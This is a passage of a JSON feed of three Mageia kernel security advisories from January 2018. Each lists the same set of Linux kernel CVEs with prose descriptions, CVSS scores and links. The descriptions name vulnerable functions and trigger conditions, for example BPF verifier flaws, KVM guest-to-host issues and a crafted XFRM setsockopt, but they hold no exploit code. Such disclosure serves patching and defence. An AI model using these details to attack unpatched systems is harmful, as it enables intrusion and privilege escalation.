to an incorrect debug exception(#DB) error. It could occur while emulating a syscall instruction. A user/process inside guest could use this flaw to potentially escalate their privileges inside guest. Linux guests are not affected.(CVE-2017-7518). 
arch/x86/kvm/mmu.c in the Linux kernel through 4.13.5, when nested virtualisation is used, does not properly traverse guest pagetable entries to resolve a guest virtual address, which allows L1 guest OS users to execute arbitrary code on the host OS or cause a denial of service (incorrect index during page walking, and host OS crash), aka an \"MMU potential stack buffer overrun\" (CVE-2017-12188). The bio_map_user_iov and bio_unmap_user functions in block/bio.c in the Linux kernel before 4.13.8 do unbalanced refcounting when a SCSI I/O vector has small consecutive buffers belonging to the same page. The bio_add_pc_page function merges them into one, but the page reference is never dropped. This causes a memory leak and possible system lockup (exploitable against the host OS by a guest OS user, if a SCSI disk is passed through to a virtual machine) due to an out-of-memory condition (CVE-2017-12190). The assoc_array_insert_into_terminal_node function in lib/assoc_array.c in the Linux kernel before 4.13.11 mishandles node splitting, which allows local users to cause a denial of service (NULL pointer dereference and panic) via a crafted application, as demonstrated by the keyring key type, and key addition and link creation operations (CVE-2017-12193). Wi-Fi Protected Access (WPA and WPA2) allows reinstallation of the Group Temporal Key (GTK) during the group key handshake, allowing an attacker within radio range to replay frames from access points to clients (CVE-2017-13080). The sctp_do_peeloff function in net/sctp/socket.c in the Linux kernel before 4.14 does not check whether the intended netns is used in a peel-off action, which allows local users to cause a denial of service (use-after-free and system crash) or possibly have unspecified other impact via crafted system calls (CVE-2017-15115). 
Race condition in the ALSA subsystem in the Linux kernel before 4.13.8 allows local users to cause a denial of service (use-after-free) or possibly have unspecified other impact via crafted /dev/snd/seq ioctl calls, related to sound/core/seq/seq_clientmgr.c and sound/core/seq/seq_ports.c (CVE-2017-15265) The KEYS subsystem in the Linux kernel through 4.13.7 mishandles use of add_key for a key that already exists but is uninstantiated, which allows local users to cause a denial of service (NULL pointer dereference and system crash) or possibly have unspecified other impact via a crafted system call (CVE-2017-15299). The XFRM dump policy implementation in net/xfrm/xfrm_user.c in the Linux kernel before 4.13.11 allows local users to gain privileges or cause a denial of service (use-after-free) via a crafted SO_RCVBUF setsockopt system call in conjunction with XFRM_MSG_GETPOLICY Netlink messages (CVE-2017-16939). The walk_hugetlb_range function in mm/pagewalk.c in the Linux kernel before 4.14.2 mishandles holes in hugetlb ranges, which allows local users to obtain sensitive information from uninitialized kernel memory via crafted use of the mincore() system call (CVE-2017-16994). The check_alu_op function in kernel/bpf/verifier.c in the Linux kernel through 4.14.8 allows local users to cause a denial of service (memory corruption) or possibly have unspecified other impact by leveraging incorrect sign extension (CVE-2017-16995). kernel/bpf/verifier.c in the Linux kernel through 4.14.8 allows local users to cause a denial of service (memory corruption) or possibly have unspecified other impact by leveraging register truncation mishandling (CVE-2017-16996). kernel/bpf/verifier.c in the Linux kernel through 4.14.8 allows local users to cause a denial of service (memory corruption) or possibly have unspecified other impact by leveraging mishandling of 32-bit ALU ops (CVE-2017-17852). 
kernel/bpf/verifier.c in the Linux kernel through 4.14.8 allows local users to cause a denial of service (memory corruption) or possibly have unspecified other impact by leveraging incorrect BPF_RSH signed bounds calculations (CVE-2017-17853). kernel/bpf/verifier.c in the Linux kernel through 4.14.8 allows local users to cause a denial of service (integer overflow and memory corruption) or possibly have unspecified other impact by leveraging unrestricted integer values for pointer arithmetic (CVE-2017-17854). kernel/bpf/verifier.c in the Linux kernel through 4.14.8 allows local users to cause a denial of service (memory corruption) or possibly have unspecified other impact by leveraging improper use of pointers in place of scalars (CVE-2017-17855). kernel/bpf/verifier.c in the Linux kernel through 4.14.8 allows local users to cause a denial of service (memory corruption) or possibly have unspecified other impact by leveraging the lack of stack-pointer alignment enforcement (CVE-2017-17856). The check_stack_boundary function in kernel/bpf/verifier.c in the Linux kernel through 4.14.8 allows local users to cause a denial of service (memory corruption) or possibly have unspecified other impact by leveraging mishandling of invalid variable stack read operations (CVE-2017-17857). kernel/bpf/verifier.c in the Linux kernel through 4.14.8 ignores unreachable code, even though it would still be processed by JIT compilers. This behavior, also considered an improper branch-pruning logic issue, could possibly be used by local users for denial of service (CVE-2017-17862). kernel/bpf/verifier.c in the Linux kernel 4.9.x through 4.9.71 does not check the relationship between pointer values and the BPF stack, which allows local users to cause a denial of service (integer overflow or invalid memory access) or possibly have unspecified other impact (CVE-2017-17863). 
kernel/bpf/verifier.c in the Linux kernel before 4.14 mishandles states_equal comparisons between the pointer data type and the UNKNOWN_VALUE data type, which allows local users to obtain potentially sensitive address information, aka a \"pointer leak\" (CVE-2017-17864). The timer_create syscall implementation in kernel/time/posix-timers.c in the Linux kernel before 4.14.8 doesn't properly validate the sigevent->sigev_notify field, which leads to out-of-bounds access in the show_timer function (called when /proc/$PID/timers is read). This allows userspace applications to read arbitrary kernel memory (on a kernel built with CONFIG_POSIX_TIMERS and CONFIG_CHECKPOINT_RESTORE)(CVE-2017-18344). The Linux Kernel 2.6.32 and later are affected by a denial of service, by flooding the diagnostic port 0x80 an exception can be triggered leading to a kernel panic (CVE-2017-1000407). For other changes in this update, read the referenced changelogs. \n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "ADJACENT_NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.0/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-01-06T00:53:31", "type": "mageia", "title": "kernel-linus update provides 4.14 series and fixes security vulnerabilities\n", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, 
"acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-0786", "CVE-2017-0861", "CVE-2017-1000407", "CVE-2017-12188", "CVE-2017-12190", "CVE-2017-12193", "CVE-2017-13080", "CVE-2017-15115", "CVE-2017-15265", "CVE-2017-15299", "CVE-2017-16939", "CVE-2017-16994", "CVE-2017-16995", "CVE-2017-16996", "CVE-2017-17852", "CVE-2017-17853", "CVE-2017-17854", "CVE-2017-17855", "CVE-2017-17856", "CVE-2017-17857", "CVE-2017-17862", "CVE-2017-17863", "CVE-2017-17864", "CVE-2017-18344", "CVE-2017-7518"], "modified": "2018-01-06T00:53:31", "id": "MGASA-2018-0064", "href": "https://advisories.mageia.org/MGASA-2018-0064.html", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-04-18T11:19:34", "description": "This kernel-tmb update provides an upgrade to the 4.14 longterm branch, currently based on 4.14.10. It also fixes at least the following security issues: An elevation of privilege vulnerability in the Broadcom wi-fi driver (CVE-2017-0786). Use-after-free vulnerability in the snd_pcm_info function in the ALSA subsystem in the Linux kernel allows attackers to gain privileges via unspecified vectors (CVE-2017-0861). Linux kernel built with the Kernel-based Virtual Machine(CONFIG_KVM) support is vulnerable to an incorrect debug exception(#DB) error. It could occur while emulating a syscall instruction. A user/process inside guest could use this flaw to potentially escalate their privileges inside guest. Linux guests are not affected.(CVE-2017-7518). arch/x86/kvm/mmu.c in the Linux kernel through 4.13.5, when nested virtualisation is used, does not properly traverse guest pagetable entries to resolve a guest virtual address, which allows L1 guest OS users to execute arbitrary code on the host OS or cause a denial of service (incorrect index during page walking, and host OS crash), aka an \"MMU potential stack buffer overrun\" (CVE-2017-12188). 
The bio_map_user_iov and bio_unmap_user functions in block/bio.c in the Linux kernel before 4.13.8 do unbalanced refcounting when a SCSI I/O vector has small consecutive buffers belonging to the same page. The bio_add_pc_page function merges them into one, but the page reference is never dropped. This causes a memory leak and possible system lockup (exploitable against the host OS by a guest OS user, if a SCSI disk is passed through to a virtual machine) due to an out-of-memory condition (CVE-2017-12190). The assoc_array_insert_into_terminal_node function in lib/assoc_array.c in the Linux kernel before 4.13.11 mishandles node splitting, which allows local users to cause a denial of service (NULL pointer dereference and panic) via a crafted application, as demonstrated by the keyring key type, and key addition and link creation operations (CVE-2017-12193). Wi-Fi Protected Access (WPA and WPA2) allows reinstallation of the Group Temporal Key (GTK) during the group key handshake, allowing an attacker within radio range to replay frames from access points to clients (CVE-2017-13080). The sctp_do_peeloff function in net/sctp/socket.c in the Linux kernel before 4.14 does not check whether the intended netns is used in a peel-off action, which allows local users to cause a denial of service (use-after-free and system crash) or possibly have unspecified other impact via crafted system calls (CVE-2017-15115). 
Race condition in the ALSA subsystem in the Linux kernel before 4.13.8 allows local users to cause a denial of service (use-after-free) or possibly have unspecified other impact via crafted /dev/snd/seq ioctl calls, related to sound/core/seq/seq_clientmgr.c and sound/core/seq/seq_ports.c (CVE-2017-15265) The KEYS subsystem in the Linux kernel through 4.13.7 mishandles use of add_key for a key that already exists but is uninstantiated, which allows local users to cause a denial of service (NULL pointer dereference and system crash) or possibly have unspecified other impact via a crafted system call (CVE-2017-15299). The XFRM dump policy implementation in net/xfrm/xfrm_user.c in the Linux kernel before 4.13.11 allows local users to gain privileges or cause a denial of service (use-after-free) via a crafted SO_RCVBUF setsockopt system call in conjunction with XFRM_MSG_GETPOLICY Netlink messages (CVE-2017-16939). The walk_hugetlb_range function in mm/pagewalk.c in the Linux kernel before 4.14.2 mishandles holes in hugetlb ranges, which allows local users to obtain sensitive information from uninitialized kernel memory via crafted use of the mincore() system call (CVE-2017-16994). The check_alu_op function in kernel/bpf/verifier.c in the Linux kernel through 4.14.8 allows local users to cause a denial of service (memory corruption) or possibly have unspecified other impact by leveraging incorrect sign extension (CVE-2017-16995). kernel/bpf/verifier.c in the Linux kernel through 4.14.8 allows local users to cause a denial of service (memory corruption) or possibly have unspecified other impact by leveraging register truncation mishandling (CVE-2017-16996). The KVM implementation in the Linux kernel through 4.14.7 allows attackers to obtain potentially sensitive information from kernel memory, aka a write_mmio stack-based out-of-bounds read, related to arch/x86/kvm/x86.c and include/trace/events/kvm.h (CVE-2017-17741). 
kernel/bpf/verifier.c in the Linux kernel through 4.14.8 allows local users to cause a denial of service (memory corruption) or possibly have unspecified other impact by leveraging mishandling of 32-bit ALU ops (CVE-2017-17852). kernel/bpf/verifier.c in the Linux kernel through 4.14.8 allows local users to cause a denial of service (memory corruption) or possibly have unspecified other impact by leveraging incorrect BPF_RSH signed bounds calculations (CVE-2017-17853). kernel/bpf/verifier.c in the Linux kernel through 4.14.8 allows local users to cause a denial of service (integer overflow and memory corruption) or possibly have unspecified other impact by leveraging unrestricted integer values for pointer arithmetic (CVE-2017-17854). kernel/bpf/verifier.c in the Linux kernel through 4.14.8 allows local users to cause a denial of service (memory corruption) or possibly have unspecified other impact by leveraging improper use of pointers in place of scalars (CVE-2017-17855). kernel/bpf/verifier.c in the Linux kernel through 4.14.8 allows local users to cause a denial of service (memory corruption) or possibly have unspecified other impact by leveraging the lack of stack-pointer alignment enforcement (CVE-2017-17856). The check_stack_boundary function in kernel/bpf/verifier.c in the Linux kernel through 4.14.8 allows local users to cause a denial of service (memory corruption) or possibly have unspecified other impact by leveraging mishandling of invalid variable stack read operations (CVE-2017-17857). kernel/bpf/verifier.c in the Linux kernel through 4.14.8 ignores unreachable code, even though it would still be processed by JIT compilers. This behavior, also considered an improper branch-pruning logic issue, could possibly be used by local users for denial of service (CVE-2017-17862). 
kernel/bpf/verifier.c in the Linux kernel 4.9.x through 4.9.71 does not check the relationship between pointer values and the BPF stack, which allows local users to cause a denial of service (integer overflow or invalid memory access) or possibly have unspecified other impact (CVE-2017-17863). kernel/bpf/verifier.c in the Linux kernel before 4.14 mishandles states_equal comparisons between the pointer data type and the UNKNOWN_VALUE data type, which allows local users to obtain potentially sensitive address information, aka a \"pointer leak\" (CVE-2017-17864). The timer_create syscall implementation in kernel/time/posix-timers.c in the Linux kernel before 4.14.8 doesn't properly validate the sigevent->sigev_notify field, which leads to out-of-bounds access in the show_timer function (called when /proc/$PID/timers is read). This allows userspace applications to read arbitrary kernel memory (on a kernel built with CONFIG_POSIX_TIMERS and CONFIG_CHECKPOINT_RESTORE)(CVE-2017-18344). The Linux Kernel 2.6.32 and later are affected by a denial of service, by flooding the diagnostic port 0x80 an exception can be triggered leading to a kernel panic (CVE-2017-1000407). This update also adds support for WireGuard VPN. For other changes in this update, read the referenced changelogs. 
\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "ADJACENT_NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.0/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-01-06T00:53:31", "type": "mageia", "title": "kernel-tmb update provides 4.14 series and fixes security vulnerabilities\n", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-0786", "CVE-2017-0861", "CVE-2017-1000407", "CVE-2017-12188", "CVE-2017-12190", "CVE-2017-12193", "CVE-2017-13080", "CVE-2017-15115", "CVE-2017-15265", "CVE-2017-15299", "CVE-2017-16939", "CVE-2017-16994", "CVE-2017-16995", "CVE-2017-16996", "CVE-2017-17741", "CVE-2017-17852", "CVE-2017-17853", "CVE-2017-17854", "CVE-2017-17855", "CVE-2017-17856", "CVE-2017-17857", "CVE-2017-17862", "CVE-2017-17863", "CVE-2017-17864", "CVE-2017-18344", "CVE-2017-7518"], "modified": "2018-01-06T00:53:31", "id": "MGASA-2018-0063", "href": "https://advisories.mageia.org/MGASA-2018-0063.html", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-04-18T11:19:34", "description": "This kernel update provides an upgrade to the 4.14 longterm branch, currently based on 4.14.10. 
It also fixes at least the following security issues: An elevation of privilege vulnerability in the Broadcom wi-fi driver (CVE-2017-0786). Use-after-free vulnerability in the snd_pcm_info function in the ALSA subsystem in the Linux kernel allows attackers to gain privileges via unspecified vectors (CVE-2017-0861). Linux kernel built with the Kernel-based Virtual Machine(CONFIG_KVM) support is vulnerable to an incorrect debug exception(#DB) error. It could occur while emulating a syscall instruction. A user/process inside guest could use this flaw to potentially escalate their privileges inside guest. Linux guests are not affected.(CVE-2017-7518). arch/x86/kvm/mmu.c in the Linux kernel through 4.13.5, when nested virtualisation is used, does not properly traverse guest pagetable entries to resolve a guest virtual address, which allows L1 guest OS users to execute arbitrary code on the host OS or cause a denial of service (incorrect index during page walking, and host OS crash), aka an \"MMU potential stack buffer overrun\" (CVE-2017-12188). The bio_map_user_iov and bio_unmap_user functions in block/bio.c in the Linux kernel before 4.13.8 do unbalanced refcounting when a SCSI I/O vector has small consecutive buffers belonging to the same page. The bio_add_pc_page function merges them into one, but the page reference is never dropped. This causes a memory leak and possible system lockup (exploitable against the host OS by a guest OS user, if a SCSI disk is passed through to a virtual machine) due to an out-of-memory condition (CVE-2017-12190). The assoc_array_insert_into_terminal_node function in lib/assoc_array.c in the Linux kernel before 4.13.11 mishandles node splitting, which allows local users to cause a denial of service (NULL pointer dereference and panic) via a crafted application, as demonstrated by the keyring key type, and key addition and link creation operations (CVE-2017-12193). 
Wi-Fi Protected Access (WPA and WPA2) allows reinstallation of the Group Temporal Key (GTK) during the group key handshake, allowing an attacker within radio range to replay frames from access points to clients (CVE-2017-13080). The sctp_do_peeloff function in net/sctp/socket.c in the Linux kernel before 4.14 does not check whether the intended netns is used in a peel-off action, which allows local users to cause a denial of service (use-after-free and system crash) or possibly have unspecified other impact via crafted system calls (CVE-2017-15115). Race condition in the ALSA subsystem in the Linux kernel before 4.13.8 allows local users to cause a denial of service (use-after-free) or possibly have unspecified other impact via crafted /dev/snd/seq ioctl calls, related to sound/core/seq/seq_clientmgr.c and sound/core/seq/seq_ports.c (CVE-2017-15265). The KEYS subsystem in the Linux kernel through 4.13.7 mishandles use of add_key for a key that already exists but is uninstantiated, which allows local users to cause a denial of service (NULL pointer dereference and system crash) or possibly have unspecified other impact via a crafted system call (CVE-2017-15299). The XFRM dump policy implementation in net/xfrm/xfrm_user.c in the Linux kernel before 4.13.11 allows local users to gain privileges or cause a denial of service (use-after-free) via a crafted SO_RCVBUF setsockopt system call in conjunction with XFRM_MSG_GETPOLICY Netlink messages (CVE-2017-16939). The walk_hugetlb_range function in mm/pagewalk.c in the Linux kernel before 4.14.2 mishandles holes in hugetlb ranges, which allows local users to obtain sensitive information from uninitialized kernel memory via crafted use of the mincore() system call (CVE-2017-16994). 
The check_alu_op function in kernel/bpf/verifier.c in the Linux kernel through 4.14.8 allows local users to cause a denial of service (memory corruption) or possibly have unspecified other impact by leveraging incorrect sign extension (CVE-2017-16995). kernel/bpf/verifier.c in the Linux kernel through 4.14.8 allows local users to cause a denial of service (memory corruption) or possibly have unspecified other impact by leveraging register truncation mishandling (CVE-2017-16996). The KVM implementation in the Linux kernel through 4.14.7 allows attackers to obtain potentially sensitive information from kernel memory, aka a write_mmio stack-based out-of-bounds read, related to arch/x86/kvm/x86.c and include/trace/events/kvm.h (CVE-2017-17741). kernel/bpf/verifier.c in the Linux kernel through 4.14.8 allows local users to cause a denial of service (memory corruption) or possibly have unspecified other impact by leveraging mishandling of 32-bit ALU ops (CVE-2017-17852). kernel/bpf/verifier.c in the Linux kernel through 4.14.8 allows local users to cause a denial of service (memory corruption) or possibly have unspecified other impact by leveraging incorrect BPF_RSH signed bounds calculations (CVE-2017-17853). kernel/bpf/verifier.c in the Linux kernel through 4.14.8 allows local users to cause a denial of service (integer overflow and memory corruption) or possibly have unspecified other impact by leveraging unrestricted integer values for pointer arithmetic (CVE-2017-17854). kernel/bpf/verifier.c in the Linux kernel through 4.14.8 allows local users to cause a denial of service (memory corruption) or possibly have unspecified other impact by leveraging improper use of pointers in place of scalars (CVE-2017-17855). kernel/bpf/verifier.c in the Linux kernel through 4.14.8 allows local users to cause a denial of service (memory corruption) or possibly have unspecified other impact by leveraging the lack of stack-pointer alignment enforcement (CVE-2017-17856). 
The check_stack_boundary function in kernel/bpf/verifier.c in the Linux kernel through 4.14.8 allows local users to cause a denial of service (memory corruption) or possibly have unspecified other impact by leveraging mishandling of invalid variable stack read operations (CVE-2017-17857). kernel/bpf/verifier.c in the Linux kernel through 4.14.8 ignores unreachable code, even though it would still be processed by JIT compilers. This behavior, also considered an improper branch-pruning logic issue, could possibly be used by local users for denial of service (CVE-2017-17862). kernel/bpf/verifier.c in the Linux kernel 4.9.x through 4.9.71 does not check the relationship between pointer values and the BPF stack, which allows local users to cause a denial of service (integer overflow or invalid memory access) or possibly have unspecified other impact (CVE-2017-17863). kernel/bpf/verifier.c in the Linux kernel before 4.14 mishandles states_equal comparisons between the pointer data type and the UNKNOWN_VALUE data type, which allows local users to obtain potentially sensitive address information, aka a \"pointer leak\" (CVE-2017-17864). The timer_create syscall implementation in kernel/time/posix-timers.c in the Linux kernel before 4.14.8 doesn't properly validate the sigevent->sigev_notify field, which leads to out-of-bounds access in the show_timer function (called when /proc/$PID/timers is read). This allows userspace applications to read arbitrary kernel memory (on a kernel built with CONFIG_POSIX_TIMERS and CONFIG_CHECKPOINT_RESTORE) (CVE-2017-18344). The Linux Kernel 2.6.32 and later are affected by a denial of service: by flooding the diagnostic port 0x80, an exception can be triggered, leading to a kernel panic (CVE-2017-1000407). This update also adds support for WireGuard VPN. For other changes in this update, read the referenced changelogs. 
\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "ADJACENT_NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.0/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-01-06T00:53:31", "type": "mageia", "title": "kernel update provides 4.14 series and fixes security vulnerabilities\n", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-0786", "CVE-2017-0861", "CVE-2017-1000407", "CVE-2017-12188", "CVE-2017-12190", "CVE-2017-12193", "CVE-2017-13080", "CVE-2017-15115", "CVE-2017-15265", "CVE-2017-15299", "CVE-2017-16939", "CVE-2017-16994", "CVE-2017-16995", "CVE-2017-16996", "CVE-2017-17741", "CVE-2017-17852", "CVE-2017-17853", "CVE-2017-17854", "CVE-2017-17855", "CVE-2017-17856", "CVE-2017-17857", "CVE-2017-17862", "CVE-2017-17863", "CVE-2017-17864", "CVE-2017-18344", "CVE-2017-7518"], "modified": "2018-01-06T00:53:31", "id": "MGASA-2018-0062", "href": "https://advisories.mageia.org/MGASA-2018-0062.html", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}]}